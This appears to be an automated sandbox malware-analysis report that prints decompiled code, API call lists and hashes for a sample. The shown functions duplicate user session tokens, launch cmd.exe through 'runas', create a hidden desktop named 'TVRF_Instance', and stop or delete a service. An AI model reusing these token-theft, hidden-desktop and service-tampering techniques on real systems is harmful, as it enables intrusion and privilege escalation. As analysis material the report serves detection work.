										_push(_t65 + 0x14);
										 *(_t65 + 0x20) = 0;
										L6F33C2EE();
										if(GetTokenInformation( *(_t65 + 0x20), 0x13, _t65 + 0x18, 4, _t65 + 0x18) != 0) {
											CloseHandle( *(_t65 + 0x20));
											CloseHandle( *(_t65 + 0x14));
											return  *(_t65 + 0x10);
										} else {
											_t58 =  *(_t65 + 0x20);
											 *(_t65 + 0x14) = _t58;
											CloseHandle( *(_t65 + 0x14));
											return _t58;
										}
									}
								}
							} else {
								goto L14;
							}
						}
					}
					L21:
					L14:
					Sleep(0x1f4);
					_t64 = _t64 + 1;
				} while (_t64 < 0x78);
				return 0;
				goto L21;
			}













                                                                                                                        0x6f3334b9
                                                                                                                        0x6f3334bd
                                                                                                                        0x6f3334c1
                                                                                                                        0x6f3334c3
                                                                                                                        0x6f3334c3
                                                                                                                        0x6f3334c7
                                                                                                                        0x6f3334ce
                                                                                                                        0x6f333518
                                                                                                                        0x6f333519
                                                                                                                        0x6f33351d
                                                                                                                        0x6f33351e
                                                                                                                        0x6f333520
                                                                                                                        0x6f333521
                                                                                                                        0x6f333522
                                                                                                                        0x6f333529
                                                                                                                        0x00000000
                                                                                                                        0x6f33352b
                                                                                                                        0x6f33352b
                                                                                                                        0x6f333531
                                                                                                                        0x6f333533
                                                                                                                        0x6f333533
                                                                                                                        0x6f33353b
                                                                                                                        0x00000000
                                                                                                                        0x6f33353b
                                                                                                                        0x6f3334d0
                                                                                                                        0x6f3334d0
                                                                                                                        0x6f3334d4
                                                                                                                        0x6f3334d9
                                                                                                                        0x6f3334da
                                                                                                                        0x6f3334dc
                                                                                                                        0x6f3334dd
                                                                                                                        0x6f3334de
                                                                                                                        0x6f3334e5
                                                                                                                        0x00000000
                                                                                                                        0x6f3334e7
                                                                                                                        0x6f3334e7
                                                                                                                        0x6f3334eb
                                                                                                                        0x6f3334ef
                                                                                                                        0x6f3334f1
                                                                                                                        0x6f3334f5
                                                                                                                        0x6f333511
                                                                                                                        0x6f333511
                                                                                                                        0x6f3334f7
                                                                                                                        0x6f3334f7
                                                                                                                        0x6f3334fc
                                                                                                                        0x6f3334fd
                                                                                                                        0x6f333502
                                                                                                                        0x00000000
                                                                                                                        0x6f333504
                                                                                                                        0x6f333504
                                                                                                                        0x6f333504
                                                                                                                        0x00000000
                                                                                                                        0x6f333502
                                                                                                                        0x6f333507
                                                                                                                        0x6f333509
                                                                                                                        0x00000000
                                                                                                                        0x6f333509
                                                                                                                        0x6f33353c
                                                                                                                        0x6f33353c
                                                                                                                        0x6f333545
                                                                                                                        0x6f33356a
                                                                                                                        0x6f33356b
                                                                                                                        0x6f33356c
                                                                                                                        0x6f333570
                                                                                                                        0x6f333577
                                                                                                                        0x00000000
                                                                                                                        0x6f333579
                                                                                                                        0x6f33358d
                                                                                                                        0x6f333599
                                                                                                                        0x00000000
                                                                                                                        0x6f33359b
                                                                                                                        0x6f33359b
                                                                                                                        0x6f3335a1
                                                                                                                        0x6f3335a2
                                                                                                                        0x6f3335a6
                                                                                                                        0x6f3335cc
                                                                                                                        0x6f3335ee
                                                                                                                        0x6f3335f9
                                                                                                                        0x6f333604
                                                                                                                        0x6f3335ce
                                                                                                                        0x6f3335ce
                                                                                                                        0x6f3335d7
                                                                                                                        0x6f3335dd
                                                                                                                        0x6f3335e8
                                                                                                                        0x6f3335e8
                                                                                                                        0x6f3335cc
                                                                                                                        0x6f333599
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x6f333545
                                                                                                                        0x6f3334e5
                                                                                                                        0x00000000
                                                                                                                        0x6f333547
                                                                                                                        0x6f33354c
                                                                                                                        0x6f333552
                                                                                                                        0x6f333553
                                                                                                                        0x6f333565
                                                                                                                        0x00000000

                                                                                                                        APIs
                                                                                                                        • WTSEnumerateSessionsA.WTSAPI32(00000000,00000000,00000001,?,?,00000000,74784F20,00000000,?,?,00000000,74784F20), ref: 6F3334DE
                                                                                                                        • WTSQuerySessionInformationA.WTSAPI32(00000000,?,00000008,?,?,00000000,74784F20,00000000,?,?,00000000,74784F20), ref: 6F333522
                                                                                                                        • WTSFreeMemory.WTSAPI32(?,00000000,?,00000008,?,?,00000000,74784F20,00000000,?,?,00000000,74784F20), ref: 6F33353C
                                                                                                                        • Sleep.KERNEL32(000001F4,00000000,?,00000008,?,?,00000000,74784F20,00000000,?,?,00000000,74784F20), ref: 6F33354C
                                                                                                                        • WTSQueryUserToken.WTSAPI32(?,?,?,00000000,?,00000008,?,?,00000000,74784F20,00000000,?,?,00000000,74784F20), ref: 6F333570
                                                                                                                        • DuplicateTokenEx.ADVAPI32(?,02000000,00000000,00000001,00000001,?,?,?,?,00000000,?,00000008,?,?,00000000,74784F20), ref: 6F333591
                                                                                                                        • RtlZeroMemory.NTDLL(?,00000004), ref: 6F3335A6
                                                                                                                        • GetTokenInformation.ADVAPI32(?,00000013(TokenIntegrityLevel),?,00000004,?,?,00000004,?,?,00000000,74784F20), ref: 6F3335BE
                                                                                                                        • CloseHandle.KERNEL32(?,?,?,00000000,74784F20), ref: 6F3335DD
                                                                                                                        • CloseHandle.KERNEL32(?,?,?,00000000,74784F20), ref: 6F3335EE
                                                                                                                        • CloseHandle.KERNEL32(?,?,?,00000000,74784F20), ref: 6F3335F9
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.754490413.000000006F331000.00000020.00020000.sdmp, Offset: 6F330000, based on PE: true
                                                                                                                        • Associated: 00000003.00000002.754474115.000000006F330000.00000002.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.754512937.000000006F33D000.00000002.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.754530015.000000006F340000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.754546355.000000006F341000.00000002.00020000.sdmp Download File
                                                                                                                        Similarity
                                                                                                                        • API ID: CloseHandleToken$InformationMemoryQuery$DuplicateEnumerateFreeSessionSessionsSleepUserZero
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 935900411-0
                                                                                                                        • Opcode ID: 87a98838fc81e9c8613c2c5544f09159438cbfb532add6b935c5ccd1851c2fd9
                                                                                                                        • Instruction ID: 61162ad227356fac011b255bfeb04e741221c3df9ebe60a7c4868b1a3e237806
                                                                                                                        • Opcode Fuzzy Hash: 87a98838fc81e9c8613c2c5544f09159438cbfb532add6b935c5ccd1851c2fd9
                                                                                                                        • Instruction Fuzzy Hash: A3418372A083959BE700DF55D881E6BB3E9FFC4B14F004A2EF58597180D775E908CB62
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 6F339C50, Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 62windowCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        C-Code - Quality: 84%
                                                                                                                        			E6F339C50(struct HWND__* _a4, intOrPtr _a8, char _a12) {
				intOrPtr _t5;
				void* _t15;
				char _t21;
				struct HWND__* _t26;

				_t5 = _a8;
				if(_t5 == 0) {
					_t26 = _a4;
					SetWindowLongA(_t26, 0xffffffec, GetWindowLongA(_t26, 0xffffffec) | 0x00000008);
					SetWindowPos(_t26, 0xffffffff, 0, 0, 0, 0, 3);
					BringWindowToTop(_t26);
					SetForegroundWindow(_t26);
					SendMessageA(_t26, 0x473, 1, 1);
					SendMessageA(_t26, 0x46f, 8, 0);
					goto L7;
				} else {
					_t15 = _t5 - 2;
					if(_t15 == 0) {
						_t21 = "\n<assembly xmlns=\"urn:schemas-microsoft-com:asm.v1\" manifestVersion=\"1.0\">\r\n  <trustInfo xmlns=\"urn:schemas-microsoft-com:asm.v3\">\r\n    <security>\r\n      <requestedPrivileges>\r\n        <requestedExecutionLevel level=\"asInvoker\" uiAccess=\"false\"></requestedExecutionLevel>\r\n      </requestedPrivileges>\r\n    </security>\r\n  </trustInfo>\r\n<assemblyIdentity type=\"win32\" name=\"Microsoft.Windows.Common-Controls\" version=\"6.0.0.0\" processorArchitecture=\"x86\" />\r\n<dependency>\r\n    <dependentAssembly>\r\n        <assemblyIdentity\r\n            type=\"win32\"\r\n            name=\"Microsoft.Windows.Common-Controls\"\r\n            version=\"6.0.0.0\"\r\n            processorArchitecture=\"x86\"\r\n            publicKeyToken=\"6595b64144ccf1df\"\r\n            language=\"*\"\r\n        />\r\n    </dependentAssembly>\r\n</dependency>\r\n</assembly>PAD"; // 0x0
						_push(0);
						_push(0);
						_push(0);
						if(E6F334230("runas", "cmd.exe", _t21) != 0) {
							goto L7;
						} else {
							return 1;
						}
					} else {
						if(_t15 != 0x83f0) {
							L7:
							return 0;
						} else {
							"\n<assembly xmlns=\"urn:schemas-microsoft-com:asm.v1\" manifestVersion=\"1.0\">\r\n  <trustInfo xmlns=\"urn:schemas-microsoft-com:asm.v3\">\r\n    <security>\r\n      <requestedPrivileges>\r\n        <requestedExecutionLevel level=\"asInvoker\" uiAccess=\"false\"></requestedExecutionLevel>\r\n      </requestedPrivileges>\r\n    </security>\r\n  </trustInfo>\r\n<assemblyIdentity type=\"win32\" name=\"Microsoft.Windows.Common-Controls\" version=\"6.0.0.0\" processorArchitecture=\"x86\" />\r\n<dependency>\r\n    <dependentAssembly>\r\n        <assemblyIdentity\r\n            type=\"win32\"\r\n            name=\"Microsoft.Windows.Common-Controls\"\r\n            version=\"6.0.0.0\"\r\n            processorArchitecture=\"x86\"\r\n            publicKeyToken=\"6595b64144ccf1df\"\r\n            language=\"*\"\r\n        />\r\n    </dependentAssembly>\r\n</dependency>\r\n</assembly>PAD" = _a12;
							return 0;
						}
					}
				}
			}







                                                                                                                        0x6f339c54
                                                                                                                        0x6f339c57
                                                                                                                        0x6f339ca3
                                                                                                                        0x6f339cb8
                                                                                                                        0x6f339ccb
                                                                                                                        0x6f339cd2
                                                                                                                        0x6f339cd9
                                                                                                                        0x6f339cef
                                                                                                                        0x6f339cfb
                                                                                                                        0x00000000
                                                                                                                        0x6f339c59
                                                                                                                        0x6f339c59
                                                                                                                        0x6f339c5c
                                                                                                                        0x6f339c77
                                                                                                                        0x6f339c7d
                                                                                                                        0x6f339c7f
                                                                                                                        0x6f339c81
                                                                                                                        0x6f339c98
                                                                                                                        0x00000000
                                                                                                                        0x6f339c9a
                                                                                                                        0x6f339c9f
                                                                                                                        0x6f339c9f
                                                                                                                        0x6f339c5e
                                                                                                                        0x6f339c63
                                                                                                                        0x6f339cff
                                                                                                                        0x6f339d01
                                                                                                                        0x6f339c69
                                                                                                                        0x6f339c6d
                                                                                                                        0x6f339c74
                                                                                                                        0x6f339c74
                                                                                                                        0x6f339c63
                                                                                                                        0x6f339c5c

                                                                                                                        APIs
                                                                                                                        • GetWindowLongA.USER32 ref: 6F339CAB
                                                                                                                        • SetWindowLongA.USER32 ref: 6F339CB8
                                                                                                                        • SetWindowPos.USER32(00000000,000000FF,00000000,00000000,00000000,00000000,00000003,?,?,?,?,?,?,00000001,FF000000), ref: 6F339CCB
                                                                                                                        • BringWindowToTop.USER32(00000000), ref: 6F339CD2
                                                                                                                        • SetForegroundWindow.USER32(00000000,?,?,?,?,?,?,00000001,FF000000), ref: 6F339CD9
                                                                                                                        • SendMessageA.USER32(00000000,00000473,00000001,00000001), ref: 6F339CEF
                                                                                                                        • SendMessageA.USER32(00000000,0000046F,00000008,00000000), ref: 6F339CFB
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.754490413.000000006F331000.00000020.00020000.sdmp, Offset: 6F330000, based on PE: true
                                                                                                                        • Associated: 00000003.00000002.754474115.000000006F330000.00000002.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.754512937.000000006F33D000.00000002.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.754530015.000000006F340000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.754546355.000000006F341000.00000002.00020000.sdmp Download File
                                                                                                                        Similarity
                                                                                                                        • API ID: Window$LongMessageSend$BringForeground
                                                                                                                        • String ID: cmd.exe$runas
                                                                                                                        • API String ID: 4108379202-3213582026
                                                                                                                        • Opcode ID: 555d3d43088666f46df829d9956af25fa9106857c7ef8af4542967abe5e26d94
                                                                                                                        • Instruction ID: b32eff405f08732c2e7ed454381ec473309fef06366ecf7992b5a1978658f110
                                                                                                                        • Opcode Fuzzy Hash: 555d3d43088666f46df829d9956af25fa9106857c7ef8af4542967abe5e26d94
                                                                                                                        • Instruction Fuzzy Hash: 4211C8337456A877E621DA28CC06F8A366EEB82B31F104218F751EA0C4CBB56510C769
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 0040E35B, Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 47COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • __EH_prolog3.LIBCMT ref: 0040E362
                                                                                                                        • std::_Lockit::_Lockit.LIBCPMT ref: 0040E36C
                                                                                                                        • int.LIBCPMT ref: 0040E383
                                                                                                                          • Part of subcall function 0040CBDA: std::_Lockit::_Lockit.LIBCPMT ref: 0040CBEB
                                                                                                                        • std::locale::_Getfacet.LIBCPMT ref: 0040E38C
                                                                                                                        • ctype.LIBCPMT ref: 0040E3A3
                                                                                                                        • __CxxThrowException@8.LIBCMT ref: 0040E3C4
                                                                                                                        • std::locale::facet::_Incref.LIBCPMT ref: 0040E3D4
                                                                                                                        • std::locale::facet::facet_Register.LIBCPMT ref: 0040E3DA
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.747256468.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000003.00000002.747207388.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749415979.0000000000733000.00000002.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749762818.0000000000805000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749786800.0000000000807000.00000008.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749814867.000000000080B000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749828681.000000000080C000.00000008.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749850510.000000000080D000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749873568.000000000080F000.00000008.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749896361.0000000000810000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749924742.0000000000813000.00000008.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749958556.0000000000817000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749980954.0000000000818000.00000008.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.750019968.0000000000822000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.750062782.0000000000823000.00000008.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.750089388.0000000000826000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.750421700.00000000008B2000.00000002.00020000.sdmp Download File
                                                                                                                        Similarity
                                                                                                                        • API ID: LockitLockit::_std::_$Exception@8GetfacetH_prolog3IncrefRegisterThrowctypestd::locale::_std::locale::facet::_std::locale::facet::facet_
                                                                                                                        • String ID: bad cast
                                                                                                                        • API String ID: 120779050-3145022300
                                                                                                                        • Opcode ID: a3f5a699adb3e8ce1de92f44d0c6cbb95e41f30e4809f8d1d1f0b06f44f70e31
                                                                                                                        • Instruction ID: 841ff04405bbb0316b189403db5acfa989f72495a0dc73ffcde05ec93c02125f
                                                                                                                        • Opcode Fuzzy Hash: a3f5a699adb3e8ce1de92f44d0c6cbb95e41f30e4809f8d1d1f0b06f44f70e31
                                                                                                                        • Instruction Fuzzy Hash: 6701C47190011687CF05FBA1C896AAE7B35BF94310F140A2AF910BB2D1DF78DA018B95
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 004167AB, Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 47COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • __EH_prolog3.LIBCMT ref: 004167B2
                                                                                                                        • std::_Lockit::_Lockit.LIBCPMT ref: 004167BC
                                                                                                                        • int.LIBCPMT ref: 004167D3
                                                                                                                          • Part of subcall function 0040CBDA: std::_Lockit::_Lockit.LIBCPMT ref: 0040CBEB
                                                                                                                        • std::locale::_Getfacet.LIBCPMT ref: 004167DC
                                                                                                                        • codecvt.LIBCPMT ref: 004167F3
                                                                                                                        • __CxxThrowException@8.LIBCMT ref: 00416814
                                                                                                                        • std::locale::facet::_Incref.LIBCPMT ref: 00416824
                                                                                                                        • std::locale::facet::facet_Register.LIBCPMT ref: 0041682A
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.747256468.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000003.00000002.747207388.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749415979.0000000000733000.00000002.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749762818.0000000000805000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749786800.0000000000807000.00000008.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749814867.000000000080B000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749828681.000000000080C000.00000008.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749850510.000000000080D000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749873568.000000000080F000.00000008.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749896361.0000000000810000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749924742.0000000000813000.00000008.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749958556.0000000000817000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749980954.0000000000818000.00000008.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.750019968.0000000000822000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.750062782.0000000000823000.00000008.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.750089388.0000000000826000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.750421700.00000000008B2000.00000002.00020000.sdmp Download File
                                                                                                                        Similarity
                                                                                                                        • API ID: LockitLockit::_std::_$Exception@8GetfacetH_prolog3IncrefRegisterThrowcodecvtstd::locale::_std::locale::facet::_std::locale::facet::facet_
                                                                                                                        • String ID: bad cast
                                                                                                                        • API String ID: 3147950714-3145022300
                                                                                                                        • Opcode ID: e0b5572c8548c622a75575ecca87d9ab55f25f090f024946b680356e8335b644
                                                                                                                        • Instruction ID: 2b815d97ff2e244cc09361beeea4d35a65eaf0dc4f538e06f9ae997cda8be315
                                                                                                                        • Opcode Fuzzy Hash: e0b5572c8548c622a75575ecca87d9ab55f25f090f024946b680356e8335b644
                                                                                                                        • Instruction Fuzzy Hash: 3901C47190011697DF05FBA0C856AEEB775BF80720F15161AE111AB2D1DF38DD42C795
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 0041BA3A, Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 47COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • __EH_prolog3.LIBCMT ref: 0041BA41
                                                                                                                        • std::_Lockit::_Lockit.LIBCPMT ref: 0041BA4B
                                                                                                                        • int.LIBCPMT ref: 0041BA62
                                                                                                                          • Part of subcall function 0040CBDA: std::_Lockit::_Lockit.LIBCPMT ref: 0040CBEB
                                                                                                                        • std::locale::_Getfacet.LIBCPMT ref: 0041BA6B
                                                                                                                        • ctype.LIBCPMT ref: 0041BA82
                                                                                                                        • __CxxThrowException@8.LIBCMT ref: 0041BAA3
                                                                                                                        • std::locale::facet::_Incref.LIBCPMT ref: 0041BAB3
                                                                                                                        • std::locale::facet::facet_Register.LIBCPMT ref: 0041BAB9
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.747256468.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000003.00000002.747207388.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749415979.0000000000733000.00000002.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749762818.0000000000805000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749786800.0000000000807000.00000008.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749814867.000000000080B000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749828681.000000000080C000.00000008.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749850510.000000000080D000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749873568.000000000080F000.00000008.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749896361.0000000000810000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749924742.0000000000813000.00000008.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749958556.0000000000817000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749980954.0000000000818000.00000008.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.750019968.0000000000822000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.750062782.0000000000823000.00000008.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.750089388.0000000000826000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.750421700.00000000008B2000.00000002.00020000.sdmp Download File
                                                                                                                        Similarity
                                                                                                                        • API ID: LockitLockit::_std::_$Exception@8GetfacetH_prolog3IncrefRegisterThrowctypestd::locale::_std::locale::facet::_std::locale::facet::facet_
                                                                                                                        • String ID: bad cast
                                                                                                                        • API String ID: 120779050-3145022300
                                                                                                                        • Opcode ID: 75c4273c6261778f6183f469528b7ab2c57b77ad1db2470bd254bf1126a2ea1e
                                                                                                                        • Instruction ID: a76356c260c168ed5891337836b1ee3f77fb3caad6dbeb86e808316f575d28fe
                                                                                                                        • Opcode Fuzzy Hash: 75c4273c6261778f6183f469528b7ab2c57b77ad1db2470bd254bf1126a2ea1e
                                                                                                                        • Instruction Fuzzy Hash: 5D01007190020A87CF01FBA0C896AEE7775BF907A0F28021AE110BB2D1DF389E418791
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 6F339BD0, Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 40threadsleepsynchronizationCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        C-Code - Quality: 100%
                                                                                                                        			E6F339BD0(void* _a4) {
				struct HDESK__* _t3;
				struct HDESK__* _t9;
				void* _t11;

				_t3 = GetThreadDesktop(GetCurrentThreadId());
				 *0x6f340484 = _t3;
				if(_t3 != 0) {
					_t3 = CreateDesktopA("TVRF_Instance", 0, 0, 0, 0x10000000, 0);
					 *0x6f340480 = _t3;
					if(_t3 != 0) {
						_t11 = CreateThread(0, 0, E6F3396D0, _a4, 0, 0);
						if(_t11 != 0) {
							WaitForSingleObject(_t11, 0xffffffff);
							CloseHandle(_t11);
							Sleep(0xfa0);
						}
						_t9 =  *0x6f340480; // 0x0
						return CloseDesktop(_t9);
					}
				}
				return _t3;
			}






                                                                                                                        0x6f339bd7
                                                                                                                        0x6f339bdd
                                                                                                                        0x6f339be4
                                                                                                                        0x6f339bf8
                                                                                                                        0x6f339bfe
                                                                                                                        0x6f339c05
                                                                                                                        0x6f339c20
                                                                                                                        0x6f339c24
                                                                                                                        0x6f339c29
                                                                                                                        0x6f339c30
                                                                                                                        0x6f339c3b
                                                                                                                        0x6f339c3b
                                                                                                                        0x6f339c41
                                                                                                                        0x00000000
                                                                                                                        0x6f339c4e
                                                                                                                        0x6f339c05
                                                                                                                        0x6f339c4f

                                                                                                                        APIs
                                                                                                                        • GetCurrentThreadId.KERNEL32 ref: 6F339BD0
                                                                                                                        • GetThreadDesktop.USER32(00000000,?,?,?,?,?,?), ref: 6F339BD7
                                                                                                                        • CreateDesktopA.USER32 ref: 6F339BF8
                                                                                                                        • CreateThread.KERNEL32 ref: 6F339C1A
                                                                                                                        • WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?,?,?), ref: 6F339C29
                                                                                                                        • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?), ref: 6F339C30
                                                                                                                        • Sleep.KERNEL32(00000FA0,?,?,?,?,?,?), ref: 6F339C3B
                                                                                                                        • CloseDesktop.USER32(00000000,?,?,?,?,?,?), ref: 6F339C48
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.754490413.000000006F331000.00000020.00020000.sdmp, Offset: 6F330000, based on PE: true
                                                                                                                        • Associated: 00000003.00000002.754474115.000000006F330000.00000002.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.754512937.000000006F33D000.00000002.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.754530015.000000006F340000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.754546355.000000006F341000.00000002.00020000.sdmp Download File
                                                                                                                        Similarity
                                                                                                                        • API ID: DesktopThread$CloseCreate$CurrentHandleObjectSingleSleepWait
                                                                                                                        • String ID: TVRF_Instance
                                                                                                                        • API String ID: 4135746217-3589830093
                                                                                                                        • Opcode ID: fedd9254724c76e711d53106da9812ed215534b8b0421131250b4c86665399ae
                                                                                                                        • Instruction ID: 3b1c4acbcab4871b2534a89a24d0069648c58b50cac7b3d4e0e0623ae70a3b4e
                                                                                                                        • Opcode Fuzzy Hash: fedd9254724c76e711d53106da9812ed215534b8b0421131250b4c86665399ae
                                                                                                                        • Instruction Fuzzy Hash: 2BF03177A41EA6EBEA71EB608C49F55366EAB06731F100108F611A52C4CF70E4209A18
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 6F333700, Relevance: 15.1, APIs: 10, Instructions: 76servicesleepCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        C-Code - Quality: 100%
                                                                                                                        			E6F333700(char* _a4, intOrPtr _a8) {
				intOrPtr _v24;
				struct _SERVICE_STATUS _v28;
				int _v32;
				char* _t12;
				void* _t24;
				void* _t28;
				void* _t31;
				int _t32;

				_t32 = 0;
				_v32 = 0;
				_t12 = OpenSCManagerA(0, 0, 0xf003f);
				_t24 = _t12;
				if(_t24 != 0) {
					L2:
					_t28 = OpenServiceA(_t24, _a4, 0xf01ff);
					if(_t28 == 0) {
						L13:
						CloseServiceHandle(_t24);
						L14:
						return _t32;
					}
					QueryServiceStatus(_t28,  &_v28);
					if(_v24 == 1) {
						L9:
						if(_a8 != 0) {
							_v32 = DeleteService(_t28);
						} else {
							_v32 = 1;
						}
						L12:
						CloseServiceHandle(_t28);
						_t32 = _v32;
						goto L13;
					}
					if(ControlService(_t28, 1,  &_v28) == 0) {
						goto L12;
					}
					_t31 = 0;
					while(1) {
						QueryServiceStatus(_t28,  &_v28);
						if(_v24 == 1) {
							goto L9;
						}
						Sleep(0x3e8);
						_t31 = _t31 + 1;
						if(_t31 < 0x3c) {
							continue;
						}
						goto L12;
					}
					goto L9;
				}
				_t24 = OpenSCManagerA(_t12, _t12, 1);
				if(_t24 == 0) {
					goto L14;
				}
				goto L2;
			}











                                                                                                                        0x6f33370c
                                                                                                                        0x6f333715
                                                                                                                        0x6f333719
                                                                                                                        0x6f33371b
                                                                                                                        0x6f33371f
                                                                                                                        0x6f333731
                                                                                                                        0x6f333743
                                                                                                                        0x6f333747
                                                                                                                        0x6f3337bf
                                                                                                                        0x6f3337c0
                                                                                                                        0x6f3337c8
                                                                                                                        0x6f3337cf
                                                                                                                        0x6f3337cf
                                                                                                                        0x6f33374f
                                                                                                                        0x6f33375a
                                                                                                                        0x6f333798
                                                                                                                        0x6f33379d
                                                                                                                        0x6f3337b0
                                                                                                                        0x6f33379f
                                                                                                                        0x6f33379f
                                                                                                                        0x6f33379f
                                                                                                                        0x6f3337b4
                                                                                                                        0x6f3337b5
                                                                                                                        0x6f3337bb
                                                                                                                        0x00000000
                                                                                                                        0x6f3337bb
                                                                                                                        0x6f33376c
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x6f333774
                                                                                                                        0x6f333776
                                                                                                                        0x6f33377c
                                                                                                                        0x6f333787
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x6f33378e
                                                                                                                        0x6f333790
                                                                                                                        0x6f333794
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x6f333796
                                                                                                                        0x00000000
                                                                                                                        0x6f333776
                                                                                                                        0x6f333727
                                                                                                                        0x6f33372b
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00000000

                                                                                                                        APIs
                                                                                                                        • OpenSCManagerA.ADVAPI32(00000000,00000000,000F003F,?,?,?,?,?,?,?,?,6F334142,USBManager,00000001), ref: 6F333719
                                                                                                                        • OpenSCManagerA.ADVAPI32(00000000,00000000,00000001,?,?,?,?,?,?,?,?,6F334142,USBManager,00000001), ref: 6F333725
